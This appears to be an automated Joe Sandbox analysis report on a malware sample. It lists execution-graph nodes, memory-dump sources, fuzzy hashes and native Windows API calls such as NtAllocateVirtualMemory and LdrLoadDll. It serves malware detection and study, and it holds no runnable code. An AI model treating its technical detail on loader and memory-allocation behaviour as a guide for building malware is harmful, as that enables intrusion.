                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4qXq$4qXq$4qXq$4qXq
                                                                                                                                                                                                        • API String ID: 0-3781232218
                                                                                                                                                                                                        • Opcode ID: 5a81bdec4183f14798828835b33059430a87697eeaf066f0bd13cda11583205f
                                                                                                                                                                                                        • Instruction ID: ed4e7d64a22ad2257cadd1d60d74f46a3a0e90c49bfa4ed0367bd2f8f04ac227
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a81bdec4183f14798828835b33059430a87697eeaf066f0bd13cda11583205f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F218430B002069FD7549EAD8850ABE72E6FBC5B54F2048AED546EF394EF718D018796

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:1.7%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                                                                                        Signature Coverage:5.7%
                                                                                                                                                                                                        Total number of Nodes:557
                                                                                                                                                                                                        Total number of Limit Nodes:66
                                                                                                                                                                                                        execution_graph 80053 41f120 80054 41f12b 80053->80054 80056 41b970 80053->80056 80057 41b996 80056->80057 80064 409d40 80057->80064 80059 41b9a2 80060 41b9c3 80059->80060 80072 40c1c0 80059->80072 80060->80054 80062 41b9b5 80108 41a6b0 80062->80108 80111 409c90 80064->80111 80066 409d4d 80067 409d54 80066->80067 80123 409c30 80066->80123 80067->80059 80073 40c1e5 80072->80073 80543 40b1c0 80073->80543 80075 40c23c 80547 40ae40 80075->80547 80077 40c262 80107 40c4b3 80077->80107 80556 4143a0 80077->80556 80079 40c2a7 80079->80107 80559 408a60 80079->80559 80081 40c2eb 80081->80107 80567 41a500 80081->80567 80085 40c341 80086 40c348 80085->80086 80579 41a010 80085->80579 80087 41bdc0 2 API calls 80086->80087 80089 40c355 80087->80089 80089->80062 80091 40c392 80092 41bdc0 2 API calls 80091->80092 80093 40c399 80092->80093 80093->80062 80094 40c3a2 80095 40f4a0 3 API calls 80094->80095 80096 40c416 80095->80096 80096->80086 80097 40c421 80096->80097 80098 41bdc0 2 API calls 80097->80098 80099 40c445 80098->80099 80584 41a060 80099->80584 80102 41a010 2 API calls 80103 40c480 80102->80103 80103->80107 80589 419e20 80103->80589 80106 41a6b0 2 API calls 80106->80107 80107->80062 80109 41a6cf ExitProcess 80108->80109 80110 41af60 LdrLoadDll 80108->80110 80110->80109 80142 418bc0 80111->80142 80115 409cb6 80115->80066 80116 409cac 80116->80115 80149 41b2b0 80116->80149 80118 409cf3 80118->80115 80120 409d13 80118->80120 80160 409ab0 80118->80160 80166 409620 LdrLoadDll 80120->80166 80122 409d25 80122->80066 80518 41b5a0 80123->80518 80126 41b5a0 LdrLoadDll 80127 409c5b 80126->80127 80128 409c71 80127->80128 80129 41b5a0 LdrLoadDll 80127->80129 80130 40f180 80128->80130 80129->80128 80131 40f199 80130->80131 80526 40b040 80131->80526 80133 40f1ac 80530 41a1e0 80133->80530 80136 409d65 80136->80059 80138 40f1d2 80139 40f1fd 80138->80139 80536 41a260 80138->80536 80141 41a490 2 API calls 80139->80141 80141->80136 80143 418bcf 80142->80143 80167 414e50 80143->80167 80145 409ca3 80146 418a70 80145->80146 80173 41a600 80146->80173 80150 41b2c9 80149->80150 80180 414a50 80150->80180 80152 41b2e1 80153 41b2ea 80152->80153 80219 41b0f0 80152->80219 80153->80118 80155 41b2fe 80155->80153 80237 419f00 80155->80237 80163 409aca 80160->80163 80496 407ea0 80160->80496 80162 409ad1 80162->80120 80163->80162 80509 408160 80163->80509 80166->80122 80168 414e5e 80167->80168 80169 414e6a 80167->80169 80168->80169 80172 4152d0 LdrLoadDll 80168->80172 80169->80145 80171 414fbc 80171->80145 80172->80171 80176 41af60 80173->80176 80175 418a85 80175->80116 80177 41af70 80176->80177 80178 41af92 80176->80178 80179 414e50 LdrLoadDll 80177->80179 80178->80175 80179->80178 80181 414d85 80180->80181 80191 414a64 80180->80191 80181->80152 80184 414b90 80248 41a360 80184->80248 80185 414b73 80305 41a460 LdrLoadDll 80185->80305 80188 414b7d 80188->80152 80189 414bb7 80190 41bdc0 2 API calls 80189->80190 80193 414bc3 80190->80193 80191->80181 80245 419c50 80191->80245 80192 414d49 80195 41a490 2 API calls 80192->80195 80193->80188 80193->80192 80194 414d5f 80193->80194 80199 414c52 80193->80199 80314 414790 LdrLoadDll NtReadFile NtClose 80194->80314 80196 414d50 80195->80196 80196->80152 80198 414d72 80198->80152 80200 414cb9 80199->80200 80202 414c61 80199->80202 80200->80192 80201 414ccc 80200->80201 80307 41a2e0 80201->80307 80204 414c66 80202->80204 80205 414c7a 80202->80205 80306 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 80204->80306 80206 414c97 80205->80206 80207 414c7f 80205->80207 80206->80196 80263 414410 80206->80263 80251 4146f0 80207->80251 80210 414c70 80210->80152 80213 414c8d 80213->80152 80215 414d2c 80311 41a490 80215->80311 80217 414caf 80217->80152 80218 414d38 80218->80152 80221 41b101 80219->80221 80220 41b113 80220->80155 80221->80220 80332 41bd40 80221->80332 80223 41b134 80335 414070 80223->80335 80225 41b180 80225->80155 80226 41b157 80226->80225 80227 414070 3 API calls 80226->80227 80230 41b179 80227->80230 80229 41b20a 80231 41b21a 80229->80231 80461 41af00 LdrLoadDll 80229->80461 80230->80225 80367 415390 80230->80367 80377 41ad70 80231->80377 80234 41b248 80456 419ec0 80234->80456 80238 41af60 LdrLoadDll 80237->80238 80239 419f1c 80238->80239 80240 419f37 80239->80240 80489 1842b2a 80239->80489 80242 41bdc0 80240->80242 80492 41a670 80242->80492 80244 41b359 80244->80118 80246 41af60 LdrLoadDll 80245->80246 80247 414b44 80246->80247 80247->80184 80247->80185 80247->80188 80249 41af60 LdrLoadDll 80248->80249 80250 41a37c NtCreateFile 80249->80250 80250->80189 80252 41470c 80251->80252 80253 41a2e0 LdrLoadDll 80252->80253 80254 41472d 80253->80254 80255 414734 80254->80255 80256 414748 80254->80256 80257 41a490 2 API calls 80255->80257 80258 41a490 2 API calls 80256->80258 80259 41473d 80257->80259 80260 414751 80258->80260 80259->80213 80315 41bfd0 LdrLoadDll RtlAllocateHeap 80260->80315 80262 41475c 80262->80213 80264 41445b 80263->80264 80267 41448e 80263->80267 80265 41a2e0 LdrLoadDll 80264->80265 80268 414476 80265->80268 80266 4145d9 80269 41a2e0 LdrLoadDll 80266->80269 80267->80266 80271 4144aa 80267->80271 80270 41a490 2 API calls 80268->80270 80277 4145f4 80269->80277 80273 41447f 80270->80273 80272 41a2e0 LdrLoadDll 80271->80272 80274 4144c5 80272->80274 80273->80217 80275 4144e1 80274->80275 80276 4144cc 80274->80276 80280 4144e6 80275->80280 80281 4144fc 80275->80281 80279 41a490 2 API calls 80276->80279 80328 41a320 LdrLoadDll 80277->80328 80283 4144d5 80279->80283 80284 41a490 2 API calls 80280->80284 80290 414501 80281->80290 80316 41bf90 80281->80316 80282 41462e 80285 41a490 2 API calls 80282->80285 80283->80217 80286 4144ef 80284->80286 80288 414639 80285->80288 80286->80217 80288->80217 80299 414513 80290->80299 80319 41a410 80290->80319 80291 414567 80292 41457e 80291->80292 80327 41a2a0 LdrLoadDll 80291->80327 80294 414585 80292->80294 80295 41459a 80292->80295 80296 41a490 2 API calls 80294->80296 80297 41a490 2 API calls 80295->80297 80296->80299 80298 4145a3 80297->80298 80300 4145cf 80298->80300 80322 41bb90 80298->80322 80299->80217 80300->80217 80302 4145ba 80303 41bdc0 2 API calls 80302->80303 80304 4145c3 80303->80304 80304->80217 80305->80188 80306->80210 80308 41af60 LdrLoadDll 80307->80308 80309 414d14 80308->80309 80310 41a320 LdrLoadDll 80309->80310 80310->80215 80312 41a4ac NtClose 80311->80312 80313 41af60 LdrLoadDll 80311->80313 80312->80218 80313->80312 80314->80198 80315->80262 80329 41a630 80316->80329 80318 41bfa8 80318->80290 80320 41af60 LdrLoadDll 80319->80320 80321 41a42c NtReadFile 80320->80321 80321->80291 80323 41bbb4 80322->80323 80324 41bb9d 80322->80324 80323->80302 80324->80323 80325 41bf90 2 API calls 80324->80325 80326 41bbcb 80325->80326 80326->80302 80327->80292 80328->80282 80330 41af60 LdrLoadDll 80329->80330 80331 41a64c RtlAllocateHeap 80330->80331 80331->80318 80462 41a540 80332->80462 80334 41bd6d 80334->80223 80336 414081 80335->80336 80337 414089 80335->80337 80336->80226 80366 41435c 80337->80366 80465 41cf30 80337->80465 80339 4140dd 80340 41cf30 2 API calls 80339->80340 80343 4140e8 80340->80343 80341 414136 80344 41cf30 2 API calls 80341->80344 80343->80341 80345 41d060 3 API calls 80343->80345 80476 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 80343->80476 80346 41414a 80344->80346 80345->80343 80347 4141a7 80346->80347 80470 41d060 80346->80470 80348 41cf30 2 API calls 80347->80348 80350 4141bd 80348->80350 80351 4141fa 80350->80351 80354 41d060 3 API calls 80350->80354 80352 41cf30 2 API calls 80351->80352 80353 414205 80352->80353 80355 41d060 3 API calls 80353->80355 80361 41423f 80353->80361 80354->80350 80355->80353 80357 414334 80478 41cf90 LdrLoadDll RtlFreeHeap 80357->80478 80359 41433e 80479 41cf90 LdrLoadDll RtlFreeHeap 80359->80479 80477 41cf90 LdrLoadDll RtlFreeHeap 80361->80477 80362 414348 80480 41cf90 LdrLoadDll RtlFreeHeap 80362->80480 80364 414352 80481 41cf90 LdrLoadDll RtlFreeHeap 80364->80481 80366->80226 80368 4153a1 80367->80368 80369 414a50 8 API calls 80368->80369 80371 4153b7 80369->80371 80370 41540a 80370->80229 80371->80370 80372 4153f2 80371->80372 80373 415405 80371->80373 80375 41bdc0 2 API calls 80372->80375 80374 41bdc0 2 API calls 80373->80374 80374->80370 80376 4153f7 80375->80376 80376->80229 80482 41ac30 80377->80482 80380 41ac30 LdrLoadDll 80381 41ad8d 80380->80381 80382 41ac30 LdrLoadDll 80381->80382 80383 41ad96 80382->80383 80384 41ac30 LdrLoadDll 80383->80384 80385 41ad9f 80384->80385 80386 41ac30 LdrLoadDll 80385->80386 80387 41ada8 80386->80387 80388 41ac30 LdrLoadDll 80387->80388 80389 41adb1 80388->80389 80390 41ac30 LdrLoadDll 80389->80390 80391 41adbd 80390->80391 80392 41ac30 LdrLoadDll 80391->80392 80393 41adc6 80392->80393 80394 41ac30 LdrLoadDll 80393->80394 80395 41adcf 80394->80395 80396 41ac30 LdrLoadDll 80395->80396 80397 41add8 80396->80397 80398 41ac30 LdrLoadDll 80397->80398 80399 41ade1 80398->80399 80400 41ac30 LdrLoadDll 80399->80400 80401 41adea 80400->80401 80402 41ac30 LdrLoadDll 80401->80402 80403 41adf6 80402->80403 80404 41ac30 LdrLoadDll 80403->80404 80405 41adff 80404->80405 80406 41ac30 LdrLoadDll 80405->80406 80407 41ae08 80406->80407 80408 41ac30 LdrLoadDll 80407->80408 80409 41ae11 80408->80409 80410 41ac30 LdrLoadDll 80409->80410 80411 41ae1a 80410->80411 80412 41ac30 LdrLoadDll 80411->80412 80413 41ae23 80412->80413 80414 41ac30 LdrLoadDll 80413->80414 80415 41ae2f 80414->80415 80416 41ac30 LdrLoadDll 80415->80416 80417 41ae38 80416->80417 80418 41ac30 LdrLoadDll 80417->80418 80419 41ae41 80418->80419 80420 41ac30 LdrLoadDll 80419->80420 80421 41ae4a 80420->80421 80422 41ac30 LdrLoadDll 80421->80422 80423 41ae53 80422->80423 80424 41ac30 LdrLoadDll 80423->80424 80425 41ae5c 80424->80425 80426 41ac30 LdrLoadDll 80425->80426 80427 41ae68 80426->80427 80428 41ac30 LdrLoadDll 80427->80428 80429 41ae71 80428->80429 80430 41ac30 LdrLoadDll 80429->80430 80431 41ae7a 80430->80431 80432 41ac30 LdrLoadDll 80431->80432 80433 41ae83 80432->80433 80434 41ac30 LdrLoadDll 80433->80434 80435 41ae8c 80434->80435 80436 41ac30 LdrLoadDll 80435->80436 80437 41ae95 80436->80437 80438 41ac30 LdrLoadDll 80437->80438 80439 41aea1 80438->80439 80440 41ac30 LdrLoadDll 80439->80440 80441 41aeaa 80440->80441 80442 41ac30 LdrLoadDll 80441->80442 80443 41aeb3 80442->80443 80444 41ac30 LdrLoadDll 80443->80444 80445 41aebc 80444->80445 80446 41ac30 LdrLoadDll 80445->80446 80447 41aec5 80446->80447 80448 41ac30 LdrLoadDll 80447->80448 80449 41aece 80448->80449 80450 41ac30 LdrLoadDll 80449->80450 80451 41aeda 80450->80451 80452 41ac30 LdrLoadDll 80451->80452 80453 41aee3 80452->80453 80454 41ac30 LdrLoadDll 80453->80454 80455 41aeec 80454->80455 80455->80234 80457 41af60 LdrLoadDll 80456->80457 80458 419edc 80457->80458 80488 1842d10 LdrInitializeThunk 80458->80488 80459 419ef3 80459->80155 80461->80231 80463 41af60 LdrLoadDll 80462->80463 80464 41a55c NtAllocateVirtualMemory 80463->80464 80464->80334 80466 41cf40 80465->80466 80467 41cf46 80465->80467 80466->80339 80468 41bf90 2 API calls 80467->80468 80469 41cf6c 80468->80469 80469->80339 80471 41cfd0 80470->80471 80472 41bf90 2 API calls 80471->80472 80473 41d02d 80471->80473 80474 41d00a 80472->80474 80473->80346 80475 41bdc0 2 API calls 80474->80475 80475->80473 80476->80343 80477->80357 80478->80359 80479->80362 80480->80364 80481->80366 80483 41ac4b 80482->80483 80484 414e50 LdrLoadDll 80483->80484 80485 41ac6b 80483->80485 80484->80485 80486 414e50 LdrLoadDll 80485->80486 80487 41ad17 80485->80487 80486->80487 80487->80380 80488->80459 80490 1842b31 80489->80490 80491 1842b3f LdrInitializeThunk 80489->80491 80490->80240 80491->80240 80493 41a679 80492->80493 80494 41af60 LdrLoadDll 80493->80494 80495 41a68c RtlFreeHeap 80494->80495 80495->80244 80497 407eb0 80496->80497 80498 407eab 80496->80498 80499 41bd40 2 API calls 80497->80499 80498->80163 80505 407ed5 80499->80505 80500 407f38 80500->80163 80501 419ec0 2 API calls 80501->80505 80502 407f3e 80504 407f64 80502->80504 80506 41a5c0 2 API calls 80502->80506 80504->80163 80505->80500 80505->80501 80505->80502 80507 41bd40 2 API calls 80505->80507 80512 41a5c0 80505->80512 80508 407f55 80506->80508 80507->80505 80508->80163 80510 41a5c0 2 API calls 80509->80510 80511 40817e 80510->80511 80511->80120 80513 41af60 LdrLoadDll 80512->80513 80514 41a5dc 80513->80514 80517 1842b90 LdrInitializeThunk 80514->80517 80515 41a5f3 80515->80505 80517->80515 80519 41b5c3 80518->80519 80522 40acf0 80519->80522 80523 40ad14 80522->80523 80524 40ad50 LdrLoadDll 80523->80524 80525 409c4a 80523->80525 80524->80525 80525->80126 80527 40b063 80526->80527 80529 40b0e0 80527->80529 80541 419c90 LdrLoadDll 80527->80541 80529->80133 80531 41af60 LdrLoadDll 80530->80531 80532 40f1bb 80531->80532 80532->80136 80533 41a7d0 80532->80533 80534 41af60 LdrLoadDll 80533->80534 80535 41a7ef LookupPrivilegeValueW 80534->80535 80535->80138 80537 41af60 LdrLoadDll 80536->80537 80538 41a27c 80537->80538 80542 1842dc0 LdrInitializeThunk 80538->80542 80539 41a29b 80539->80139 80541->80529 80542->80539 80544 40b1f0 80543->80544 80545 40b040 LdrLoadDll 80544->80545 80546 40b204 80545->80546 80546->80075 80548 40ae51 80547->80548 80549 40ae4d 80547->80549 80550 40ae6a 80548->80550 80551 40ae9c 80548->80551 80549->80077 80594 419cd0 LdrLoadDll 80550->80594 80595 419cd0 LdrLoadDll 80551->80595 80553 40aead 80553->80077 80555 40ae8c 80555->80077 80557 40f4a0 3 API calls 80556->80557 80558 4143c6 80557->80558 80558->80079 80560 408a6f 80559->80560 80596 4087a0 80560->80596 80563 408a9d 80563->80081 80564 4087a0 19 API calls 80565 408a8a 80564->80565 80565->80563 80614 40f710 10 API calls 80565->80614 80568 41af60 LdrLoadDll 80567->80568 80569 41a51c 80568->80569 80733 1842da0 LdrInitializeThunk 80569->80733 80570 40c322 80572 40f4a0 80570->80572 80573 40f4bd 80572->80573 80734 419fc0 80573->80734 80576 40f505 80576->80085 80577 41a010 2 API calls 80578 40f52e 80577->80578 80578->80085 80580 41a02c 80579->80580 80581 41af60 LdrLoadDll 80579->80581 80740 1842c30 LdrInitializeThunk 80580->80740 80581->80580 80582 40c385 80582->80091 80582->80094 80585 41af60 LdrLoadDll 80584->80585 80586 41a07c 80585->80586 80741 1842c50 LdrInitializeThunk 80586->80741 80587 40c459 80587->80102 80590 41af60 LdrLoadDll 80589->80590 80591 419e3c 80590->80591 80742 1842ed0 LdrInitializeThunk 80591->80742 80592 40c4ac 80592->80106 80594->80555 80595->80553 80597 407ea0 4 API calls 80596->80597 80607 4087ba 80596->80607 80597->80607 80598 408a49 80598->80563 80598->80564 80599 408a3f 80600 408160 2 API calls 80599->80600 80600->80598 80603 419f00 2 API calls 80603->80607 80605 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 80605->80607 80606 41a490 LdrLoadDll NtClose 80606->80607 80607->80598 80607->80599 80607->80603 80607->80605 80607->80606 80612 419e20 2 API calls 80607->80612 80615 419d10 80607->80615 80618 4085d0 80607->80618 80630 40f5f0 LdrLoadDll NtClose 80607->80630 80631 419d90 LdrLoadDll 80607->80631 80632 419dc0 LdrLoadDll 80607->80632 80633 419e50 LdrLoadDll 80607->80633 80634 4083a0 80607->80634 80650 405f60 LdrLoadDll 80607->80650 80612->80607 80614->80563 80616 41af60 LdrLoadDll 80615->80616 80617 419d2c 80616->80617 80617->80607 80619 4085e6 80618->80619 80651 419880 80619->80651 80621 4085ff 80626 408771 80621->80626 80672 4081a0 80621->80672 80623 4086e5 80624 4083a0 11 API calls 80623->80624 80623->80626 80625 408713 80624->80625 80625->80626 80627 419f00 2 API calls 80625->80627 80626->80607 80628 408748 80627->80628 80628->80626 80629 41a500 2 API calls 80628->80629 80629->80626 80630->80607 80631->80607 80632->80607 80633->80607 80635 4083c9 80634->80635 80712 408310 80635->80712 80637 4083dc 80639 41a500 2 API calls 80637->80639 80640 408467 80637->80640 80642 408462 80637->80642 80720 40f670 80637->80720 80639->80637 80640->80607 80641 41a490 2 API calls 80643 40849a 80641->80643 80642->80641 80643->80640 80644 419d10 LdrLoadDll 80643->80644 80645 4084ff 80644->80645 80645->80640 80724 419d50 80645->80724 80647 408563 80647->80640 80648 414a50 8 API calls 80647->80648 80649 4085b8 80648->80649 80649->80607 80650->80607 80652 41bf90 2 API calls 80651->80652 80653 419897 80652->80653 80679 409310 80653->80679 80655 4198b2 80656 4198f0 80655->80656 80657 4198d9 80655->80657 80660 41bd40 2 API calls 80656->80660 80658 41bdc0 2 API calls 80657->80658 80659 4198e6 80658->80659 80659->80621 80661 41992a 80660->80661 80662 41bd40 2 API calls 80661->80662 80663 419943 80662->80663 80669 419be4 80663->80669 80685 41bd80 80663->80685 80666 419bd0 80667 41bdc0 2 API calls 80666->80667 80668 419bda 80667->80668 80668->80621 80670 41bdc0 2 API calls 80669->80670 80671 419c39 80670->80671 80671->80621 80673 40829f 80672->80673 80674 4081b5 80672->80674 80673->80623 80674->80673 80675 414a50 8 API calls 80674->80675 80676 408222 80675->80676 80677 41bdc0 2 API calls 80676->80677 80678 408249 80676->80678 80677->80678 80678->80623 80680 409335 80679->80680 80681 40acf0 LdrLoadDll 80680->80681 80682 409368 80681->80682 80684 40938d 80682->80684 80688 40cf20 80682->80688 80684->80655 80706 41a580 80685->80706 80689 40cf4c 80688->80689 80690 41a1e0 LdrLoadDll 80689->80690 80691 40cf65 80690->80691 80692 40cf6c 80691->80692 80699 41a220 80691->80699 80692->80684 80696 40cfa7 80697 41a490 2 API calls 80696->80697 80698 40cfca 80697->80698 80698->80684 80700 41af60 LdrLoadDll 80699->80700 80701 41a23c 80700->80701 80705 1842bc0 LdrInitializeThunk 80701->80705 80702 40cf8f 80702->80692 80704 41a810 LdrLoadDll 80702->80704 80704->80696 80705->80702 80707 41af60 LdrLoadDll 80706->80707 80708 41a59c 80707->80708 80709 419bc9 80708->80709 80711 1842eb0 LdrInitializeThunk 80708->80711 80709->80666 80709->80669 80711->80709 80713 408328 80712->80713 80714 40acf0 LdrLoadDll 80713->80714 80715 408343 80714->80715 80716 414e50 LdrLoadDll 80715->80716 80717 408353 80716->80717 80718 40835c PostThreadMessageW 80717->80718 80719 408370 80717->80719 80718->80719 80719->80637 80721 40f683 80720->80721 80727 419e90 80721->80727 80725 41af60 LdrLoadDll 80724->80725 80726 419d6c 80725->80726 80726->80647 80728 419eac 80727->80728 80729 41af60 LdrLoadDll 80727->80729 80732 1842cf0 LdrInitializeThunk 80728->80732 80729->80728 80730 40f6ae 80730->80637 80732->80730 80733->80570 80735 41af60 LdrLoadDll 80734->80735 80736 419fdc 80735->80736 80739 1842e50 LdrInitializeThunk 80736->80739 80737 40f4fe 80737->80576 80737->80577 80739->80737 80740->80582 80741->80587 80742->80592 80744 18429f0 LdrInitializeThunk

                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                        Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 0 41a410-41a459 call 41af60 NtReadFile
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                        • String ID: 1JA$rMA$rMA
                                                                                                                                                                                                        • API String ID: 2738559852-782607585
                                                                                                                                                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                        • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                                                                                                                                        Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 238 40acf0-40ad0c 239 40ad14-40ad19 238->239 240 40ad0f call 41cc50 238->240 242 40ad1b-40ad1e 239->242 243 40ad1f-40ad2d call 41d070 239->243 240->239 246 40ad3d-40ad4e call 41b4a0 243->246 247 40ad2f-40ad3a call 41d2f0 243->247 252 40ad50-40ad64 LdrLoadDll 246->252 253 40ad67-40ad6a 246->253 247->246 252->253
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Load
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                                                                                        • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                                                        • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                                                                                                                                                                        Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 254 41a360-41a3b1 call 41af60 NtCreateFile
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                        • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                                                                        Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 264 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                        • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                                                                                                                                                                        Function 0041A53A Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 261 41a53a-41a556 262 41a55c-41a57d NtAllocateVirtualMemory 261->262 263 41a557 call 41af60 261->263 263->262
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                        • String ID:
